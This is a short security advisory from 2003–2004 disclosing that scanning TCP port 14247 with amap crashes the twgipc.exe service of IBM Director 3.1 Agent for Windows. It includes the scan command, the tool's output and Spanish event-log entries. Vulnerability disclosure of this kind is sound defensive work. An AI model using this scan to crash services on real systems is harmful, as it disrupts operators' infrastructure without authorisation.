IBM Director 3.1 Agent for Windows is vulnerable to a remote denial of service attack when being scanned.
11c8a7a8d97e1b7c71871fe52805b379be6151773027ff19753134ed8fd5d859
<html>
<head>
<meta http-equiv="Content-Language" content="es">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>Juanma Merino®</title>
</head>
<body>
<p><font face="Arial">Security Advisory by Juanma Merino</font></p>
<p><font face="Arial"><u><b>Remote DoS on </b> <b>IBM Director 3.1 Agent
for Windows</b></u></font></p>
<p><font face="Arial"><b>Reported to esCERT UPC on:</b> May 2003 (no response)</font></p>
<p><font face="Arial"><b>Vendor contacted on:</b> March 1, 2004 (no response)</font></p>
<p><font face="Arial"><b>Vendor:</b> IBM (www.ibm.com) </font></p>
<p><font face="Arial"><b>Systems Affected:</b></font></p>
<p><font face="Arial">IBM Director 3.1 Agent for Windows</font></p>
<p> <font face="Arial"> - Windows 2000 professional SP3, SP4</font></p>
<p> <font face="Arial"> - Windows NT4 SP6a</font></p>
<p> <font face="Arial"> - Other Windows flavours not tested but
probably affected too.</font></p>
<p><font face="Arial"><b>Description:</b></font></p>
<p><font face="Arial">When running Amap (www.thc.org) in order to discover what
protocol is running on TCP port 14247, IBM Director Agent for Windows crashes.</font></p>
<p><font face="Arial">TCP port 14247 is owned by twgipc.exe. Fport shows this:</font></p>
<p><font face="Arial">"twgipc -> 14247 TCP %ProgramFiles%\UMS\Director\bin\twgipc.exe" </font></p>
<p><font face="Arial">Amap in this case looks like this:</font></p>
<p>root@localhost root]# amap -sT xxx.x.224.48 14247 <br>
Amap v2.1 started at Mon May 26 16:23:34 2003, stand back and keep children away <br>
Couldn't connect to tcp port 14247 on 100.1.224.48. Service crashed after scanning? <br>
Unidentified ports: 14247:tcp (total 1). <br>
Amap v2.1 ended at Mon May 26 16:24:20 2003 </p>
<p><font face="Arial">(linux box has a wrong time)</font></p>
<p><font face="Arial">This action generates two system events (sorry, they are
in Spanish):</font></p>
<p>************************************* <br>
Tipo de suceso: Error <br>
Origen del suceso: TWGIPC <br>
Categoría del suceso: Ninguno <br>
Id. del suceso: 0 <br>
Fecha: 23/05/2003 <br>
Hora: 14:44:08 <br>
Usuario: No disponible <br>
Equipo: XXXXX <br>
Descripción: <br>
No se encuentra la descripción del Id. de suceso ( 0 ) en el origen ( TWGIPC ). Es posible que el equipo local no tenga la información de Registro o archivos DLL de mensajes necesarios para mostrar mensajes desde un equipo remoto. La siguiente información es par Error TWGIPC: 6; SetServiceStatus(dwCurrentState=1, dwWin32ExitCode=0, dwCheckPoint=0). <br>
************************************* <br>
Tipo de suceso: Información <br>
Origen del suceso: Application Popup <br>
Categoría del suceso: Ninguno <br>
Id. del suceso: 26 <br>
Fecha: 26/05/2003 <br>
Hora: 16:23:19 <br>
Usuario: No disponible <br>
Equipo: XXXXX <br>
Descripción: <br>
Aplicación emergente: TCPIP: twgipc.exe - Error de aplicación : La instrucción en "0x5dc674eb" hace referencia a la memoria en "0x01060000". La memoria no se puede "written". <br>
<br>
Haga clic en Aceptar para finalizar este programa <br>
Haga clic en CANCELAR para depurar el programa <br>
************************************** </p>
<p><font face="Arial">After the service crash restart UMS service is needed in
order to keep the agent running again.</font></p>
<p><font face="Arial"><b>Solution:</b> I don't know any solution.</font></p>
<p><font face="Arial"><b>Note:</b> I have no answer from IBM. I don't know if
they've send my email to the trash or if they are working on it. So I've decided
to post the vulnerability. If someone with greater skills wants to take a look
contact me so I have more information regarding this vulnerability.</font></p>
<p><font face="Arial"><b>E-mail:</b> jmmerino[at]jazzfree.com</font></p>
<p>----------------------------------------------------------------<br>
<font face="Arial">Juanma Merino<br>
<a href="https://t3k.ibernet.com">https://t3k.ibernet.com</a> <br>
-----------------------------------------------------------------------------</font></p>
<p> </p>
<p> </p>
</body>
</html>